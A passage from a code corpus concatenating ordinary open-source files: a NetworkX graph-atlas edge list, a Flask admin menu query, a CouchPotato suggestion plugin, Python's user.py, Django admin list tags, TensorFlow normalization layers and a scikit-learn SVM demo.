[6, 2],
[6, 1],
[1, 5],
[1, 2],
[5, 4],
[6, 4],
[3, 6],
[2, 5],
[4, 1],
[3, 5],
[7, 5],
[6, 7],
[7, 3],
[4, 7],
[7, 1],
[2, 7]]],
['edgelist',
'G1242',
7,
[[4, 3],
[6, 2],
[6, 1],
[1, 5],
[5, 6],
[1, 2],
[4, 2],
[3, 6],
[2, 5],
[4, 1],
[3, 5],
[7, 1],
[4, 7],
[7, 2],
[6, 7],
[7, 3],
[5, 7]]],
['edgelist',
'G1243',
7,
[[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1244',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6],
[7, 2],
[1, 7],
[6, 7]]],
['edgelist',
'G1245',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7]]],
['edgelist',
'G1246',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1247',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1248',
7,
[[5, 1],
[5, 6],
[4, 1],
[4, 6],
[3, 1],
[3, 6],
[2, 4],
[2, 5],
[2, 6],
[2, 1],
[3, 4],
[3, 5],
[7, 1],
[6, 7],
[7, 2],
[3, 7],
[7, 5],
[4, 7]]],
['edgelist',
'G1249',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1250',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1251',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1252',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]]]
GAG=[]
for i in range(1253):
g=make_small_graph(descr_list[i])
GAG.append(g)
return GAG
| apache-2.0 |
chenghao/haoAdmin_flask | dal/__init__.py | 1 | 1454 | # coding:utf-8
from models import HMenu, HOrg, HRole, HUser
from peewee import JOIN_INNER, fn
__author__ = "chenghao"
def init_menus(user_id):
    """Build the menu tree shown to a user right after login.

    Selects every menu row whose comma-separated org/role id lists match
    the given user's org and role memberships, then splits the rows into
    top-level menus and a mapping of children keyed by their parent.

    :param user_id: primary key of the logged-in user
    :return: dict with "level1" (list of top-level menu dicts) and
        "level2" (dict mapping "menu_<parent pid>" to child menu lists)
    """
    query = HMenu.select(
        HMenu.pid, HMenu.menu_name.alias("title"), HMenu.menu_url.alias("href"), HMenu.parent_menu, HMenu.icon
    ).join(
        HOrg, join_type=JOIN_INNER, on=HMenu.org_ids ** (fn.CONCAT("%,", HOrg.pid, ",%"))
    ).join(
        HRole, join_type=JOIN_INNER, on=HMenu.role_ids ** (fn.CONCAT("%,", HRole.pid, ",%"))
    ).join(
        HUser, join_type=JOIN_INNER,
        on=((HUser.org_ids ** (fn.CONCAT("%,", HOrg.pid, ",%"))) &
            (HUser.role_ids ** (fn.CONCAT("%,", HRole.pid, ",%"))))
    ).where(
        HUser.pid == user_id
    ).order_by(HMenu.parent_menu, HMenu.sort)

    rows = list(query.dicts())

    top_level = []   # first-level menu entries, in query order
    children = {}    # "menu_<pid>" -> list of second-level entries
    child_key = "menu_%s"
    for row in rows:
        parent = row["parent_menu"]
        if parent:
            # Rows are ordered by parent_menu, so top-level rows (empty
            # parent_menu) arrive first and their bucket already exists.
            children[child_key % parent].append(row)
        else:
            children[child_key % row["pid"]] = []
            top_level.append(row)
    return {"level1": top_level, "level2": children}
| apache-2.0 |
jeroenj/CouchPotatoServer | couchpotato/core/media/movie/suggestion/main.py | 7 | 3765 | from couchpotato.api import addApiView
from couchpotato.core.event import fireEvent
from couchpotato.core.helpers.variable import splitString, removeDuplicate, getIdentifier
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
autoload = 'Suggestion'
class Suggestion(Plugin):
    """Serve and cache movie suggestions for the dashboard.

    Registers two API endpoints:
      * suggestion.view   - return cached (or freshly fetched) suggestions
      * suggestion.ignore - ignore / mark-seen one suggestion, persist that
                            choice and top up the cached list
    """

    def __init__(self):
        # Expose the two suggestion endpoints on the API.
        addApiView('suggestion.view', self.suggestView)
        addApiView('suggestion.ignore', self.ignoreView)

    def suggestView(self, limit = 6, **kwargs):
        """Return up to `limit` suggestions.

        kwargs may carry comma-separated 'movies', 'ignored' and 'seen'
        imdb-id lists; when absent they fall back to the active library
        and the persisted suggest_ignore / suggest_seen properties.
        """
        movies = splitString(kwargs.get('movies', ''))
        ignored = splitString(kwargs.get('ignored', ''))
        seen = splitString(kwargs.get('seen', ''))

        cached_suggestion = self.getCache('suggestion_cached')
        if cached_suggestion:
            suggestions = cached_suggestion
        else:
            # No explicit list given: seed with every active/done library movie.
            if not movies or len(movies) == 0:
                active_movies = fireEvent('media.with_status', ['active', 'done'], single = True)
                movies = [getIdentifier(x) for x in active_movies]

            if not ignored or len(ignored) == 0:
                ignored = splitString(Env.prop('suggest_ignore', default = ''))
            if not seen or len(seen) == 0:
                movies.extend(splitString(Env.prop('suggest_seen', default = '')))

            suggestions = fireEvent('movie.suggest', movies = movies, ignore = ignored, single = True)
            self.setCache('suggestion_cached', suggestions, timeout = 6048000)  # Cache for 10 weeks

        return {
            'success': True,
            'count': len(suggestions),
            'suggestions': suggestions[:int(limit)]
        }

    def ignoreView(self, imdb = None, limit = 6, remove_only = False, mark_seen = False, **kwargs):
        """Ignore (or mark seen) the movie `imdb`, persist the choice and
        return the suggestion that takes its place in the visible list."""
        # API parameters arrive as strings; suggestView already coerces its
        # limit before slicing, so do the same here — `limit` is used below
        # in slice arithmetic (`limit - 1`) which fails on a str.
        limit = int(limit)

        ignored = splitString(Env.prop('suggest_ignore', default = ''))
        seen = splitString(Env.prop('suggest_seen', default = ''))

        new_suggestions = []
        if imdb:
            if mark_seen:
                seen.append(imdb)
                Env.prop('suggest_seen', ','.join(set(seen)))
            elif not remove_only:
                ignored.append(imdb)
                Env.prop('suggest_ignore', ','.join(set(ignored)))

            new_suggestions = self.updateSuggestionCache(ignore_imdb = imdb, limit = limit, ignored = ignored, seen = seen)

        return {
            'result': True,
            'ignore_count': len(ignored),
            'suggestions': new_suggestions[limit - 1:limit]
        }

    def updateSuggestionCache(self, ignore_imdb = None, limit = 6, ignored = None, seen = None):
        """Drop `ignore_imdb` from the cached suggestions and, when fewer
        than `limit` remain, fetch replacements; returns the new cache."""
        # Combine with previous suggestion_cache
        cached_suggestion = self.getCache('suggestion_cached') or []
        new_suggestions = []
        ignored = [] if not ignored else ignored
        seen = [] if not seen else seen

        if ignore_imdb:
            # Keep everything except the ignored id, de-duplicating by imdb id.
            suggested_imdbs = []
            for cs in cached_suggestion:
                if cs.get('imdb') != ignore_imdb and cs.get('imdb') not in suggested_imdbs:
                    suggested_imdbs.append(cs.get('imdb'))
                    new_suggestions.append(cs)

        # Get new results and add them
        if len(new_suggestions) - 1 < limit:
            active_movies = fireEvent('media.with_status', ['active', 'done'], single = True)
            movies = [getIdentifier(x) for x in active_movies]
            movies.extend(seen)

            # Everything previously suggested should not come back.
            ignored.extend([x.get('imdb') for x in cached_suggestion])
            suggestions = fireEvent('movie.suggest', movies = movies, ignore = removeDuplicate(ignored), single = True)

            if suggestions:
                new_suggestions.extend(suggestions)

        self.setCache('suggestion_cached', new_suggestions, timeout = 3024000)
        return new_suggestions
| gpl-3.0 |
matmutant/sl4a | python/src/Lib/user.py | 313 | 1627 | """Hook to allow user-specified customization code to run.
As a policy, Python doesn't run user-specified code on startup of
Python programs (interactive sessions execute the script specified in
the PYTHONSTARTUP environment variable if it exists).
However, some programs or sites may find it convenient to allow users
to have a standard customization file, which gets run when a program
requests it. This module implements such a mechanism. A program
that wishes to use the mechanism must execute the statement
import user
The user module looks for a file .pythonrc.py in the user's home
directory and if it can be opened, execfile()s it in its own global
namespace. Errors during this phase are not caught; that's up to the
program that imports the user module, if it wishes.
The user's .pythonrc.py could conceivably test for sys.version if it
wishes to do different things depending on the Python version.
"""
from warnings import warnpy3k
warnpy3k("the user module has been removed in Python 3.0", stacklevel=2)
del warnpy3k

import os

# Work out the user's home directory, falling back to the current
# directory when nothing better is available.
home = os.curdir                        # Default
if 'HOME' in os.environ:
    home = os.environ['HOME']
elif os.name == 'posix':
    home = os.path.expanduser("~/")
elif os.name == 'nt':                   # Contributed by Jeff Bauer
    # Windows: prefer HOMEDRIVE + HOMEPATH, fall back to HOMEPATH alone.
    if 'HOMEPATH' in os.environ:
        drive = os.environ.get('HOMEDRIVE', '')
        home = drive + os.environ['HOMEPATH']

pythonrc = os.path.join(home, ".pythonrc.py")
try:
    f = open(pythonrc)
except IOError:
    # No customization file (or unreadable) — silently do nothing.
    pass
else:
    f.close()
    # Run the user's startup code in this module's global namespace;
    # any errors it raises propagate to whoever imported us.
    execfile(pythonrc)
| apache-2.0 |
rooshilp/CMPUT410Lab6 | virt_env/virt1/lib/python2.7/site-packages/django/contrib/admin/templatetags/admin_list.py | 75 | 17069 | from __future__ import unicode_literals
import datetime
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from django.contrib.admin.utils import (lookup_field, display_for_field,
display_for_value, label_for_field)
from django.contrib.admin.views.main import (ALL_VAR, EMPTY_CHANGELIST_VALUE,
ORDER_VAR, PAGE_VAR, SEARCH_VAR)
from django.contrib.admin.templatetags.admin_static import static
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import NoReverseMatch
from django.db import models
from django.utils import formats
from django.utils.html import escapejs, format_html
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.utils.encoding import force_text
from django.template import Library
from django.template.loader import get_template
from django.template.context import Context
# Template tag registry all tags/filters in this module attach to.
register = Library()

# Sentinel used inside page ranges to mark an ellipsis ("...") gap.
DOT = '.'
@register.simple_tag
def paginator_number(cl, i):
    """
    Generates an individual page index link in a paginated list.

    Renders an ellipsis for the DOT sentinel, a plain highlighted span
    for the current page, and an anchor for any other page index.
    """
    if i == DOT:
        return '... '
    if i == cl.page_num:
        # Current page: no link, just the highlighted number (1-based).
        return format_html('<span class="this-page">{0}</span> ', i + 1)
    # The last page link gets the "end" CSS class.
    end_attr = ' class="end"' if i == cl.paginator.num_pages - 1 else ''
    return format_html('<a href="{0}"{1}>{2}</a> ',
                       cl.get_query_string({PAGE_VAR: i}),
                       mark_safe(end_attr),
                       i + 1)
@register.inclusion_tag('admin/pagination.html')
def pagination(cl):
    """
    Generates the series of links to the pages in a paginated list.

    Returns the template context for admin/pagination.html: the change
    list itself, whether pagination is required, an optional "show all"
    URL, and the list of page indexes to render (DOT marks an ellipsis).
    """
    paginator, page_num = cl.paginator, cl.page_num

    # Pagination is pointless when everything fits on (or is forced onto)
    # a single page.
    pagination_required = (not cl.show_all or not cl.can_show_all) and cl.multi_page
    if not pagination_required:
        page_range = []
    else:
        ON_EACH_SIDE = 3  # page links kept on each side of the current page
        ON_ENDS = 2       # page links kept at each extreme of the range

        # If there are 10 or fewer pages, display links to every page.
        # Otherwise, do some fancy
        if paginator.num_pages <= 10:
            page_range = range(paginator.num_pages)
        else:
            # Insert "smart" pagination links, so that there are always ON_ENDS
            # links at either end of the list of pages, and there are always
            # ON_EACH_SIDE links at either end of the "current page" link.
            page_range = []
            if page_num > (ON_EACH_SIDE + ON_ENDS):
                # Leading ellipsis: first ON_ENDS pages, DOT, then the window
                # leading up to the current page.
                page_range.extend(range(0, ON_ENDS))
                page_range.append(DOT)
                page_range.extend(range(page_num - ON_EACH_SIDE, page_num + 1))
            else:
                page_range.extend(range(0, page_num + 1))
            if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
                # Trailing ellipsis: window after the current page, DOT, then
                # the last ON_ENDS pages.
                page_range.extend(range(page_num + 1, page_num + ON_EACH_SIDE + 1))
                page_range.append(DOT)
                page_range.extend(range(paginator.num_pages - ON_ENDS, paginator.num_pages))
            else:
                page_range.extend(range(page_num + 1, paginator.num_pages))

    need_show_all_link = cl.can_show_all and not cl.show_all and cl.multi_page
    return {
        'cl': cl,
        'pagination_required': pagination_required,
        # False (not a URL) when the "show all" link should not be offered.
        'show_all_url': need_show_all_link and cl.get_query_string({ALL_VAR: ''}),
        'page_range': page_range,
        'ALL_VAR': ALL_VAR,
        # NOTE(review): the literal '1' key is presumably consumed by the
        # pagination template — verify before removing.
        '1': 1,
    }
def result_headers(cl):
    """
    Generates the list column headers.

    Yields one dict per list_display column with the header text, CSS
    class attribute, sortability flags and — for sortable columns — the
    querystring URLs that make the column primary, remove it from the
    ordering, or toggle its direction.
    """
    ordering_field_columns = cl.get_ordering_field_columns()
    for i, field_name in enumerate(cl.list_display):
        text, attr = label_for_field(
            field_name, cl.model,
            model_admin=cl.model_admin,
            return_attr=True
        )
        if attr:
            # Potentially not sortable

            # if the field is the action checkbox: no sorting and special class
            if field_name == 'action_checkbox':
                yield {
                    "text": text,
                    "class_attrib": mark_safe(' class="action-checkbox-column"'),
                    "sortable": False,
                }
                continue

            admin_order_field = getattr(attr, "admin_order_field", None)
            if not admin_order_field:
                # Not sortable
                yield {
                    "text": text,
                    "class_attrib": format_html(' class="column-{0}"', field_name),
                    "sortable": False,
                }
                continue

        # OK, it is sortable if we got this far
        th_classes = ['sortable', 'column-{0}'.format(field_name)]
        order_type = ''
        new_order_type = 'asc'
        sort_priority = 0
        sorted = False
        # Is it currently being sorted on?
        if i in ordering_field_columns:
            sorted = True
            order_type = ordering_field_columns.get(i).lower()
            # 1-based position of this column within the active ordering.
            sort_priority = list(ordering_field_columns).index(i) + 1
            th_classes.append('sorted %sending' % order_type)
            # Clicking again flips the direction.
            new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]

        # build new ordering param
        o_list_primary = []  # URL for making this field the primary sort
        o_list_remove = []  # URL for removing this field from sort
        o_list_toggle = []  # URL for toggling order type for this field
        # Encode one ordering entry: optional '-' (descending) + column index.
        make_qs_param = lambda t, n: ('-' if t == 'desc' else '') + str(n)

        for j, ot in ordering_field_columns.items():
            if j == i:  # Same column
                param = make_qs_param(new_order_type, j)
                # We want clicking on this header to bring the ordering to the
                # front
                o_list_primary.insert(0, param)
                o_list_toggle.append(param)
                # o_list_remove - omit
            else:
                param = make_qs_param(ot, j)
                o_list_primary.append(param)
                o_list_toggle.append(param)
                o_list_remove.append(param)

        if i not in ordering_field_columns:
            # Column not currently sorted: clicking makes it the primary sort.
            o_list_primary.insert(0, make_qs_param(new_order_type, i))

        yield {
            "text": text,
            "sortable": True,
            "sorted": sorted,
            "ascending": order_type == "asc",
            "sort_priority": sort_priority,
            "url_primary": cl.get_query_string({ORDER_VAR: '.'.join(o_list_primary)}),
            "url_remove": cl.get_query_string({ORDER_VAR: '.'.join(o_list_remove)}),
            "url_toggle": cl.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}),
            "class_attrib": format_html(' class="{0}"', ' '.join(th_classes)) if th_classes else '',
        }
def _boolean_icon(field_val):
    """Return an <img> tag for a boolean value (True/False/None)."""
    # Map True/False/None onto the yes/no/unknown static admin icons.
    icon_name = {True: 'yes', False: 'no', None: 'unknown'}[field_val]
    icon_url = static('admin/img/icon-%s.gif' % icon_name)
    return format_html('<img src="{0}" alt="{1}" />', icon_url, field_val)
def items_for_result(cl, result, form):
    """
    Generates the actual list of data.

    Yields one rendered <th>/<td> cell per list_display column for the
    given result row, plus (when editing) a trailing cell carrying the
    hidden primary-key form field.
    """

    def link_in_col(is_first, field_name, cl):
        # Should this column's cell link to the change view?
        if cl.list_display_links is None:
            return False
        if is_first and not cl.list_display_links:
            return True
        return field_name in cl.list_display_links

    first = True
    pk = cl.lookup_opts.pk.attname
    for field_name in cl.list_display:
        row_classes = ['field-%s' % field_name]
        try:
            f, attr, value = lookup_field(field_name, result, cl.model_admin)
        except ObjectDoesNotExist:
            result_repr = EMPTY_CHANGELIST_VALUE
        else:
            if f is None:
                # Not a model field: a callable / admin method supplied value.
                if field_name == 'action_checkbox':
                    row_classes = ['action-checkbox']
                allow_tags = getattr(attr, 'allow_tags', False)
                boolean = getattr(attr, 'boolean', False)
                if boolean:
                    allow_tags = True
                result_repr = display_for_value(value, boolean)
                # Strip HTML tags in the resulting text, except if the
                # function has an "allow_tags" attribute set to True.
                if allow_tags:
                    result_repr = mark_safe(result_repr)
                if isinstance(value, (datetime.date, datetime.time)):
                    row_classes.append('nowrap')
            else:
                if isinstance(f.rel, models.ManyToOneRel):
                    # Foreign key: show the related object itself.
                    field_val = getattr(result, f.name)
                    if field_val is None:
                        result_repr = EMPTY_CHANGELIST_VALUE
                    else:
                        result_repr = field_val
                else:
                    result_repr = display_for_field(value, f)
                if isinstance(f, (models.DateField, models.TimeField, models.ForeignKey)):
                    row_classes.append('nowrap')
        if force_text(result_repr) == '':
            # Keep the table cell from collapsing when the value is empty.
            result_repr = mark_safe('&nbsp;')
        row_class = mark_safe(' class="%s"' % ' '.join(row_classes))
        # If list_display_links not defined, add the link tag to the first field
        if link_in_col(first, field_name, cl):
            table_tag = 'th' if first else 'td'
            first = False

            # Display link to the result's change_view if the url exists, else
            # display just the result's representation.
            try:
                url = cl.url_for_result(result)
            except NoReverseMatch:
                link_or_text = result_repr
            else:
                url = add_preserved_filters({'preserved_filters': cl.preserved_filters, 'opts': cl.opts}, url)
                # Convert the pk to something that can be used in Javascript.
                # Problem cases are long ints (23L) and non-ASCII strings.
                if cl.to_field:
                    attr = str(cl.to_field)
                else:
                    attr = pk
                value = result.serializable_value(attr)
                result_id = escapejs(value)
                link_or_text = format_html(
                    '<a href="{0}"{1}>{2}</a>',
                    url,
                    format_html(' onclick="opener.dismissRelatedLookupPopup(window, &#39;{0}&#39;); return false;"', result_id) if cl.is_popup else '',
                    result_repr)

            yield format_html('<{0}{1}>{2}</{3}>',
                              table_tag,
                              row_class,
                              link_or_text,
                              table_tag)
        else:
            # By default the fields come from ModelAdmin.list_editable, but if we pull
            # the fields out of the form instead of list_editable custom admins
            # can provide fields on a per request basis
            if (form and field_name in form.fields and not (
                    field_name == cl.model._meta.pk.name and
                    form[cl.model._meta.pk.name].is_hidden)):
                bf = form[field_name]
                result_repr = mark_safe(force_text(bf.errors) + force_text(bf))
            yield format_html('<td{0}>{1}</td>', row_class, result_repr)
    if form and not form[cl.model._meta.pk.name].is_hidden:
        # Trailing cell with the (visible) primary-key form field.
        yield format_html('<td>{0}</td>', force_text(form[cl.model._meta.pk.name]))
class ResultList(list):
    """List of rendered cells for one changelist row.

    Carries the ``form`` used to render the row (or ``None`` when the
    changelist is not editable) so templates can report per-row form
    errors. Kept as a ``list`` subclass for backwards compatibility
    with existing admin templates.
    """
    def __init__(self, form, *items):
        super(ResultList, self).__init__(*items)
        self.form = form
def results(cl):
    """Yield one ResultList per row of the changelist.

    When the changelist has a formset (list_editable), each row is paired
    with its form; otherwise the form slot is None.
    """
    if cl.formset:
        pairs = zip(cl.result_list, cl.formset.forms)
    else:
        pairs = ((res, None) for res in cl.result_list)
    for res, form in pairs:
        yield ResultList(form, items_for_result(cl, res, form))
def result_hidden_fields(cl):
    """Yield the rendered hidden primary-key fields of an editable changelist.

    Produces nothing when there is no formset (non-editable list) or when
    the pk field is visible.
    """
    if not cl.formset:
        return
    pk_name = cl.model._meta.pk.name
    for res, form in zip(cl.result_list, cl.formset.forms):
        pk_field = form[pk_name]
        if pk_field.is_hidden:
            yield mark_safe(force_text(pk_field))
@register.inclusion_tag("admin/change_list_results.html")
def result_list(cl):
"""
Displays the headers and data list together
"""
headers = list(result_headers(cl))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
return {'cl': cl,
'result_hidden_fields': list(result_hidden_fields(cl)),
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(cl))}
@register.inclusion_tag('admin/date_hierarchy.html')
def date_hierarchy(cl):
    """
    Displays the date hierarchy for date drill-down functionality.

    Returns a context dict with 'show', optional 'back' (link to the parent
    drill-down level) and 'choices' (links for the next, finer level).
    Returns None implicitly when the changelist has no date_hierarchy.
    """
    if cl.date_hierarchy:
        field_name = cl.date_hierarchy
        field = cl.opts.get_field_by_name(field_name)[0]
        # DateTimeField querysets expose .datetimes(); DateField only .dates().
        dates_or_datetimes = 'datetimes' if isinstance(field, models.DateTimeField) else 'dates'
        year_field = '%s__year' % field_name
        month_field = '%s__month' % field_name
        day_field = '%s__day' % field_name
        field_generic = '%s__' % field_name
        year_lookup = cl.params.get(year_field)
        month_lookup = cl.params.get(month_field)
        day_lookup = cl.params.get(day_field)

        # Build a querystring for the given filters, dropping any existing
        # lookups on this field (field_generic prefix).
        link = lambda filters: cl.get_query_string(filters, [field_generic])

        if not (year_lookup or month_lookup or day_lookup):
            # select appropriate start level: if all rows fall in one year
            # (or one month), skip straight to that drill-down level.
            date_range = cl.queryset.aggregate(first=models.Min(field_name),
                                               last=models.Max(field_name))
            if date_range['first'] and date_range['last']:
                if date_range['first'].year == date_range['last'].year:
                    year_lookup = date_range['first'].year
                    if date_range['first'].month == date_range['last'].month:
                        month_lookup = date_range['first'].month

        if year_lookup and month_lookup and day_lookup:
            # Deepest level: a single day is selected; no further choices.
            day = datetime.date(int(year_lookup), int(month_lookup), int(day_lookup))
            return {
                'show': True,
                'back': {
                    'link': link({year_field: year_lookup, month_field: month_lookup}),
                    'title': capfirst(formats.date_format(day, 'YEAR_MONTH_FORMAT'))
                },
                'choices': [{'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))}]
            }
        elif year_lookup and month_lookup:
            # Month selected: offer the days that actually have rows.
            days = cl.queryset.filter(**{year_field: year_lookup, month_field: month_lookup})
            days = getattr(days, dates_or_datetimes)(field_name, 'day')
            return {
                'show': True,
                'back': {
                    'link': link({year_field: year_lookup}),
                    'title': str(year_lookup)
                },
                'choices': [{
                    'link': link({year_field: year_lookup, month_field: month_lookup, day_field: day.day}),
                    'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))
                } for day in days]
            }
        elif year_lookup:
            # Year selected: offer the months that actually have rows.
            months = cl.queryset.filter(**{year_field: year_lookup})
            months = getattr(months, dates_or_datetimes)(field_name, 'month')
            return {
                'show': True,
                'back': {
                    'link': link({}),
                    'title': _('All dates')
                },
                'choices': [{
                    'link': link({year_field: year_lookup, month_field: month.month}),
                    'title': capfirst(formats.date_format(month, 'YEAR_MONTH_FORMAT'))
                } for month in months]
            }
        else:
            # Nothing selected: top level lists all years with rows.
            years = getattr(cl.queryset, dates_or_datetimes)(field_name, 'year')
            return {
                'show': True,
                'choices': [{
                    'link': link({year_field: str(year.year)}),
                    'title': str(year.year),
                } for year in years]
            }
@register.inclusion_tag('admin/search_form.html')
def search_form(cl):
    """
    Displays a search form for searching the list.
    """
    # Only show the hit count when a filter/search actually narrowed it.
    count_differs = cl.result_count != cl.full_result_count
    return {
        'cl': cl,
        'show_result_count': count_differs,
        'search_var': SEARCH_VAR,
    }
@register.simple_tag
def admin_list_filter(cl, spec):
    """Render a single list-filter spec with its own template."""
    context = Context({
        'title': spec.title,
        'choices': list(spec.choices(cl)),
        'spec': spec,
    })
    return get_template(spec.template).render(context)
@register.inclusion_tag('admin/actions.html', takes_context=True)
def admin_actions(context):
    """
    Track the number of times the action field has been rendered on the page,
    so we know which value to use.
    """
    previous_index = context.get('action_index', -1)
    context['action_index'] = previous_index + 1
    return context
| apache-2.0 |
crackhopper/TFS-toolbox | tfs/core/layer/normalization.py | 1 | 1965 | import tensorflow as tf
import numpy as np
from tfs.core.layer import ops as ops
from tfs.core.layer.base import Layer
import tfs.core.initializer.init_func as init
from tfs.core.util import get_arg_dict
class LRN(Layer):
  """Local Response Normalization layer.

  Thin wrapper around ``tf.nn.local_response_normalization``; the
  radius/alpha/beta/bias parameters are forwarded verbatim.
  """
  def __init__(self,
               net,
               radius,
               alpha,
               beta,
               bias=1.0,
               name=None,
               print_names=['radius','alpha','beta']
  ):
    # NOTE(review): mutable default for print_names — benign here because it
    # is never mutated, but worth confirming get_arg_dict does not alias it.
    # get_arg_dict captures this frame's argument names/values, so the
    # parameter names above are part of the stored configuration.
    vtable = get_arg_dict(excludes=['self','net'])
    super(LRN,self).__init__(net,**vtable)

  def _build(self):
    # Apply LRN to the incoming tensor; parameters come from self.param,
    # populated by the base Layer from the captured vtable.
    inTensor = self._in
    output = tf.nn.local_response_normalization(
      inTensor,
      depth_radius=self.param.radius,
      alpha=self.param.alpha,
      beta=self.param.beta,
      bias=self.param.bias,
      name=self.name)
    return output
class BN(Layer):
  """Batch Normalization layer.

  Wraps ``tf.nn.batch_normalization`` with learned (or constant-initialized)
  mean/variance variables and optional scale/offset, followed by an
  optional activation (relu by default).
  """
  def __init__(self,
               net,
               scale_offset=True,
               activation=ops.relu,
               name=None,
               print_names=[]
  ):
    # get_arg_dict captures this frame's argument names/values, so the
    # parameter names above are part of the stored configuration.
    vtable = get_arg_dict(excludes=['self','net'])
    super(BN,self).__init__(net,**vtable)

  def _build(self):
    inTensor = self._in
    input_shape = inTensor.get_shape()
    scale_offset = self.param.scale_offset
    # Normalization statistics/affine parameters are per-channel
    # (last dimension of the input).
    shape = [input_shape[-1]]
    if scale_offset:
      scale = self._make_variable('scale', shape=shape,init=init.constant())
      offset = self._make_variable('offset', shape=shape,init=init.constant())
    else:
      scale, offset = (None, None)
    output = tf.nn.batch_normalization(
      inTensor,
      mean=self._make_variable('mean', shape=shape,init=init.constant()),
      variance=self._make_variable('variance', shape=shape,init=init.constant()),
      offset=offset,
      scale=scale,
      # TODO: This is the default Caffe batch norm eps
      # Get the actual eps from parameters
      variance_epsilon=1e-5,
      name=self.name)
    if self.param.activation:
      output = self.param.activation(output)
    return output
| mit |
nav13n/Data-Science-45min-Intros | support-vector-machines-101/rbf-circles.py | 26 | 1504 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__="Josh Montague"
__license__="MIT License"
import sys
import json
import numpy as np
import matplotlib.pyplot as plt
try:
import seaborn as sns
except ImportError as e:
sys.stderr.write("seaborn not installed. Using default matplotlib templates.")
from sklearn.svm import SVC
from sklearn.datasets import make_circles
# adapted from:
# http://scikit-learn.org/stable/auto_examples/svm/plot_svm_kernels.html
# http://scikit-learn.org/stable/auto_examples/decomposition/plot_kernel_pca.html
# Generate two concentric noisy circles: xx are 2-D points, yy the labels.
xx, yy = make_circles(n_samples=500, factor=0.1, noise=0.15)

# RBF-kernel SVM can separate this radially-symmetric, non-linear data.
clf = SVC(kernel='rbf')

clf.fit(xx, yy)

plt.figure(figsize=(8,6))

# Highlight the support vectors with large hollow markers.
plt.scatter(clf.support_vectors_[:, 0], clf.support_vectors_[:, 1],
                facecolors='none', zorder=10, s=300)
plt.scatter(xx[:, 0], xx[:, 1], c=yy, zorder=10, cmap=plt.cm.Paired, s=100)
#plt.scatter(xx[:, 0], xx[:, 1], c=yy, zorder=10, s=100)

plt.axis('tight')
x_min = -1.5
x_max = 1.5
y_min = -1.5
y_max = 1.5

# Evaluate the decision function on a 200x200 grid covering the plot area.
XX, YY = np.mgrid[x_min:x_max:200j, y_min:y_max:200j]
Z = clf.decision_function(np.c_[XX.ravel(), YY.ravel()])

# Put the result into a color plot
Z = Z.reshape(XX.shape)
#plt.figure(fignum, figsize=(4, 3))
#plt.pcolormesh(XX, YY, Z > 0, cmap=plt.cm.Paired)
plt.pcolormesh(XX, YY, Z > 0, alpha=0.1)
# Draw the decision boundary (0) and the +/-0.5 margin contours.
plt.contour(XX, YY, Z, colors=['k', 'k', 'k'], linestyles=['--', '-', '--'],
                levels=[-.5, 0, .5])
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)

plt.title('rbf kernel')

plt.show()
CiscoSystems/vespa | neutron/tests/unit/extensions/v2attributes.py | 68 | 1555 | # Copyright (c) 2012 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
